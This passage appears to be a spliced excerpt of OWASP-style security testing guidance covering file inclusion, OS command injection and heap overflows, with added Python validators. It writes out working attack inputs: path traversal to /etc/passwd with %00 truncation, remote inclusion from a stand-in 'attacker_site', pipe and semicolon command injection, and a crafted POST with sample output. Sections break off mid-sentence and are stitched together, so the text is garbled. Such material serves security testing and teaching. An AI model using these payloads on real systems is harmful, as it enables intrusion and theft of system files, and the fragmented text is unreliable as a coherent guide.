Summary
The File Inclusion vulnerability allows an attacker to include a file, usually by exploiting a “dynamic file inclusion” mechanism implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.
This can lead to something as simple as outputting the contents of the file, but depending on the severity, it can also lead to:
• Code execution on the web server
• Code execution on the client-side such as JavaScript which can lead
http://vulnerable_host/preview.php?file=../../../../etc/passwd
<?php include("include/" . $_GET['filename'] . ".php"); ?>
http://vulnerable_host/preview.php?file=../../../../etc/passwd%00
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
alex:x:500:500:alex:/home/alex:/bin/bash
margo:x:501:501::/home/margo:/bin/bash
...
$incfile = $_REQUEST["file"];
include($incfile . ".php");
http://vulnerable_host/vuln_page.php?file=http://attacker_site/malicious_page
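As an added illustration (not part of the original text), the following Python shows one way a server-side handler could resolve the ?file= parameter so that each of the three requests above is refused: the remote URL, the %00-truncated name and the ../ traversal. INCLUDE_DIR is an assumed path and resolve_include is a hypothetical helper name.

```python
import os
from typing import Optional
from urllib.parse import unquote, urlsplit

# Constructed for this example: the directory the application keeps its
# includable pages in (hypothetical path, not taken from the page).
INCLUDE_DIR = "/var/www/app/include"

def resolve_include(raw_file: str) -> Optional[str]:
    """Turn the user-supplied ?file= value into a path under INCLUDE_DIR.

    Returns the resolved path, or None when the request must be refused.
    Each check defeats one trick shown above: a remote URL (remote file
    inclusion), an embedded NUL byte (the %00 trick that chops off the
    appended ".php"), and ../ traversal out of the include directory.
    """
    name = unquote(raw_file)           # decode %00, %2e, ... as the server would
    if "\x00" in name:
        return None                    # NUL-terminated name: ".php" would be dropped
    if urlsplit(name).scheme:
        return None                    # "http://attacker_site/..." carries a scheme
    # Append the extension first, then canonicalise lexically. In production
    # use os.path.realpath as well, so symlinks under INCLUDE_DIR are resolved.
    candidate = os.path.normpath(os.path.join(INCLUDE_DIR, name + ".php"))
    # Component-wise containment: a plain startswith() would still accept
    # "/var/www/app/include_evil/x.php"; commonpath() does not.
    if os.path.commonpath([INCLUDE_DIR, candidate]) != INCLUDE_DIR:
        return None
    return candidate
```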
is subject to this exploit. With the ability to execute OS commands, the user can upload malicious programs or even obtain passwords. OS command injection is preventable when security is emphasized during the design and development of applications.
How to Test
When viewing a file in a web application, the file name is often shown in the URL. Perl allows piping data from a process into an open statement. The user can simply append the pipe symbol “|” onto the end of the file name.
Example URL before alteration:
http://sensitive/cgi-bin/userData.pl?doc=user1.txt
Example URL modified:
http://sensitive/cgi-bin/userData.pl?doc=/bin/ls|
This will execute the command “/bin/ls”.
Appending a semicolon to the end of a URL for a .PHP page, followed by an operating system command, will execute the command. %3B is the URL-encoded form of the semicolon.
Example:
http://sensitive/something.php?dir=%3Bcat%20/etc/passwd
Example
Consider the case of an application that contains a set of documents that you can browse from the Internet. If you fire up WebScarab, you can capture an HTTP POST request like the following:
POST http://www.example.com/public/doc HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20061010 FireFox/2.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://127.0.0.1/WebGoat/attack?Screen=20
Cookie: JSESSIONID=295500AD2AAEEBEDC9DB86E34F24A0A5
Authorization: Basic T2Vbc1Q9Z3V2Tc3e=
Content-Type: application/x-www-form-urlencoded
Content-length: 33

Doc=Doc1.pdf
In this POST request, we notice how the application retrieves the public documentation. Now we can test whether it is possible to inject an operating system command into the POST request. Try the following:
POST http://www.example.com/public/doc HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20061010 FireFox/2.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://127.0.0.1/WebGoat/attack?Screen=20
Cookie: JSESSIONID=295500AD2AAEEBEDC9DB86E34F24A0A5
Authorization: Basic T2Vbc1Q9Z3V2Tc3e=
Content-Type: application/x-www-form-urlencoded
Content-length: 33

Doc=Doc1.pdf+|+Dir c:\
If the application doesn’t validate the request, we can obtain the following result:
Exec Results for 'cmd.exe /c type "C:\httpd\public\doc\"Doc=Doc1.pdf+|+Dir c:\'
Output...
Il volume nell'unità C non ha etichetta.
Numero di serie Del volume: 8E3F-4B61
Directory of c:\
18/10/2006 00:27 2,675 Dir_Prog.txt
18/10/2006 00:28 3,887 Dir_ProgFile.txt
16/11/2006 10:43 Doc
11/11/2006 17:25 Documents and Settings
25/10/2006 03:11 I386
14/11/2006 18:51 h4ck3r
30/09/2005 21:40 25,934 OWASP1.JPG
03/11/2006 18:29 Prog
18/11/2006 11:20 Program Files
16/11/2006 21:12 Software
24/10/2006 18:25 Setup
24/10/2006 23:37 Technologies
18/11/2006 11:14
3 File 32,496 byte
13 Directory 6,921,269,248 byte disponibili
Return code: 0
In this case, we have successfully performed an OS injection attack.
in these tags is overwritten. When the heap management routine frees the buffer, a memory address overwrite takes place, leading to an access violation. When the overflow is executed in a controlled fashion, the vulnerability would allow an adversary to overwrite a desired memory location with a user-controlled value. In practice, an attacker would be able to overwrite function pointers and various addresses stored in structures like GOT, .dtors or TEB with the address of a malicious payload.
There are numerous variants of the heap overflow (heap corruption) vulnerability that can allow anything from overwriting function pointers to exploiting memory management structures for arbitrary code execution. Locating heap overflows requires closer examination in comparison to stack overflows, since there are certain conditions that need to exist in the code for these vulnerabilities to be exploitable.
How to Test
Black Box testing
The principles of black box testing for heap overflows remain the same as for stack overflows. The key is to supply as input strings that are longer than expected. Although the test process remains the same, the results that are visible in a debugger are significantly different. While in the case of a stack overflow an instruction pointer or SEH overwrite would be apparent, this does not hold true for a heap overflow condition. When debugging a Windows program, a heap overflow can appear in several different forms, the most common one being a pointer exchange taking place after the heap management routine comes into action. Shown below is a scenario that illustrates a heap overflow vulnerability.
The two registers shown, EAX and ECX, can be populated with user-supplied addresses which are a part of the data that is used to overflow the heap buffer. One of the addresses can point to a function pointer which needs to be overwritten, for example UEF (Unhandled Exception Filter), and the other can be the address of user-supplied code that needs to be executed.
When the MOV instructions shown in the left pane are executed, the overwrite takes place and, when the function is called, user-supplied code gets executed. As mentioned previously, other methods of testing such vulnerabilities include reverse engineering the application binaries, which is a complex and tedious
Tools
• OWASP WebScarab
• OWASP WebGoat
References
White papers
• http://www.securityfocus.com/infocus/1709
Remediation
Sanitization
The URL and form data need to be sanitized for invalid characters. A “blacklist” of characters is an option, but it may be difficult to think of all of the characters to validate against, and there may be some that have not been discovered yet. A “white list” containing only allowable characters should be created to validate the user input. Characters that were missed, as well as undiscovered threats, should be eliminated by this list.
Permissions
The web application and its components should be running under strict permissions that do not allow operating system command execution. Verify all of this information when testing from a Gray Box point of view.
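Added example, not from the original page, tying the How to Test cases above to the white-list advice in Remediation: the page's sample parameter values are run through an allowlist validator that decodes %3B and + before checking, and an accepted document name is mapped to a file for the application to open itself rather than passed to a shell. The doc root, DOC_NAME pattern and function names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# "White list" for the document parameter, as the Remediation section
# recommends: a bare file name with an expected extension, nothing else.
DOC_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.(pdf|txt)")

# Characters that only a shell cares about (the | and ; used in the tests
# above, plus the rest of the usual set). Used only to label rejections.
SHELL_META = re.compile(r"[|;&`$<>\n\r]")

def validate_doc(raw_value):
    """Check one URL or form value. Returns (accepted, decoded_value, reason).

    The value is decoded the way the server would (%3B -> ';', '+' -> ' ')
    before any check, so URL encoding cannot hide a metacharacter.
    """
    decoded = unquote_plus(raw_value)
    if DOC_NAME.fullmatch(decoded):
        return True, decoded, "ok"
    if SHELL_META.search(decoded):
        return False, decoded, "shell metacharacter"
    if "/" in decoded or "\\" in decoded or "\x00" in decoded:
        return False, decoded, "path or NUL character"
    return False, decoded, "not in allowlist"

def document_path(raw_value, doc_root="C:\\httpd\\public\\doc"):
    """Return the file to read for an accepted value, else None.

    The application should open this path itself instead of running
    'cmd.exe /c type ...': with no shell in the chain there is no command
    line to inject into, and the allowlist keeps the name inside doc_root.
    """
    ok, name, _ = validate_doc(raw_value)
    return doc_root + "\\" + name if ok else None

# Parameter values taken from the test cases above.
SAMPLE_VALUES = [
    "user1.txt",
    "/bin/ls|",
    "%3Bcat%20/etc/passwd",
    "Doc1.pdf",
    "Doc1.pdf+|+Dir c:\\",
]

def scan(values):
    """Return {raw_value: reason} for every value the validator rejects."""
    report = {}
    for value in values:
        accepted, _, reason = validate_doc(value)
        if not accepted:
            report[value] = reason
    return report
```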